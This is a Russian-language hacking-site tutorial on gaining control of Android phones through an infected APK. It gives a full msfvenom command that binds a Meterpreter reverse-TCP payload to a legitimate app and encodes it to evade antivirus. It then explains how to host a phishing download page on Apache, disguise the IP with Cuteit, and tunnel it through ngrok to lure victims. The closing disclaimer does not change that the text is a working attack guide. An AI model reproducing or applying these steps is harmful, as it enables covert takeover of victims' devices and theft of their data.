Получаем доступ к android через зараженный APK

Получаем доступ к android через зараженный APK

Для начала нам необходимо будет скачать какой нибудь APK файл не более 5 мб, для этого идём на 4PDA ищем там что нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.

Теперь открываем терминал и прописываем:

msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk'  -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk

-x - использовать такой то файл

-p - прилепить пейлоад

-o - назвать получившийся файл так-то

-e - зашифровать от обнаружения антивирусами

-i - количество "слоёв" шифрования

 

Жмём Enter и ждем когда веном либо выдаст ошибку либо скомпилирует файл.

Если выдает ошибку обновляем версию APKtool. Если не помогло ищем другую АПкашку для заражения. пишите если будут ошибки.

 

Теперь используя фишинг и социальную инженерию сделаем простенькую страничку для нашего софта.

Страничку можно создать используя конфигураторы сайтов либо использовать исходник приложеный ниже. Если вы используйте конфигуратор то знайте что он прилепит к ней вагон ненужного кода и прочий мусор.



Исходники веб-сайта (пароль от архива: social_engineering)


Содержимое папки Social по адресу /var/www/html (APK который мы заразили помещаем туда же)

 

Если не отображается картинка то необходимо предоставить доступ пользователю для чтения и записи в папке www.


Открываем файл index.html при помощи текстового редактора и исправляем все надписи на нужные вам, в часности <a href="forgo.apk">Установить</a>

forgo меняем на название вашего файла.

В терминале пишем

 sudo systemctl start apache2

Как всё запустится открываем браузер, вводим в адресную строку свой ip.

Для того что-бы наш ip стал похож на веб адресс нам понадобится программа Cuteit которую мы скачаем с гитхаба

https://github.com/D4Vinci/Cuteit.git 

там можно тупо следовать инструкции из файла readme

переходим в папку с кутитом через терминал и прописываем комманду

 python ./Cuteit.py ваш ip например 123.15.46.54

Получаем такую картину: 

 

Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер. 

Но в адресной строке в тот же момент появляется палево в виде нашего ip.

Это мы победим при помощи Ngrok.

Прём по ссылке:

https://ngrok.com/download 

Качаем, регистрируемся и следуя инструкции добавляем ключи, иначе не будет работать как нужно.

Когда всё готово через терминал переходим в папку с Нгроком и прописываем

 sudo ./ngrok http 80

Наши рабочие ссылки в строке Forwarding

 

Готово.

 
Поделиться
Плюсануть
Отправить

Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный материалами сайта.

0 Rubilnik Android / Статьи 97 06 сентябрь 2019

Рекомендуем также

Ломаем софт для Android: Часть 2
Ломаем софт для Android: Часть 2

В прошлый раз мы разобрались, как взламывать приложения для Android. В большинстве случаев сделать...

Взлом онлайн игр на телефоне
Взлом онлайн игр на телефоне

Инструкция для просмотра, изменения и повторной отправки запросов в он-лайн играх на телефоне....

Hill Climb Racing
Hill Climb Racing

Как сделать много денег в игре Внимание! Для этого способа требуются root права 1. Для начала любым...

Poweramp 2.0.9 разблокированный + 16 скинов
Poweramp 2.0.9 разблокированный + 16 скинов

Мощный музыкальный плеер для Android. Для активации требуется ROOT и BusyBox! Если активатор...


Комментарии (0)


Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

iOS cydia small iconRepo [cydia.shlyahten.ru]

G iconGAPPS (все версии)